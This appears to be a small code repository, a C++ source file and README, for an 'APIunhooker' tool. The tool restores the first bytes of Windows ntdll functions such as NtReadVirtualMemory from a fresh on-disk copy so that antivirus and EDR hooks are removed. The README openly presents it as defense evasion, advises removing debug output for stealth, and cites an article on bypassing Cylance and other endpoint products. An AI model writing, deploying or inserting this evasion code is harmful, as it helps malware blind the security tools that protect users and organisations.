├── APIunhook.cpp └── README.md /APIunhook.cpp: -------------------------------------------------------------------------------- 1 | #include "pch.h" 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | using namespace std; 8 | #pragma comment(lib,"imagehlp") 9 | 10 | void unhookAPI(const char* functionName) { 11 | 12 | HMODULE lib = LoadLibrary(L"C:\\Windows\\System32\\ntdll.dll"); 13 | BYTE assemblyBytes[5] = {}; 14 | 15 | if (lib) { 16 | void* fa = GetProcAddress(lib, functionName); 17 | if (fa) { 18 | BYTE* read = (BYTE*)fa; 19 | for (int i = 0; i < 5; i++) { 20 | assemblyBytes[i] = read[i]; 21 | } 22 | WriteProcessMemory(GetCurrentProcess(), GetProcAddress(GetModuleHandle(L"ntdll"), functionName), (LPCVOID)assemblyBytes, 5, NULL); 23 | FreeLibrary(lib); 24 | 25 | } 26 | else 27 | printf("Function not found!\n"); 28 | } 29 | else 30 | printf("Error loading library!\n"); 31 | } 32 | 33 | int main() { 34 | unhookAPI("NtReadVirtualMemory"); 35 | return 0; 36 | } 37 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # APIunhooker 2 | C++ function that will automagically unhook a specified Windows API 3 | 4 | Simply add the functions to whatever you need it for, and call the function with unhookAPI([APIname]); 5 | 6 | ex. unhookAPI("NtReadVirtualMemory"); 7 | 8 | Currently it has ntdll hardcoded, but there is no reason why you couldn't use it to unhook any other API. Make sure you use the full path for the dll. 9 | 10 | Use it as many times as needed in your code to unhook all the APIs you want/need to for whatever reason. 11 | 12 | There are some debugging printf you might want to remove for stealth reasons, but I left them for your testing. 13 | 14 | This tool is based off this article https://ired.team/offensive-security/defense-evasion/bypassing-cylance-and-other-avs-edrs-by-unhooking-windows-apis by [@spotheplanet](https://twitter.com/spotheplanet) 15 | --------------------------------------------------------------------------------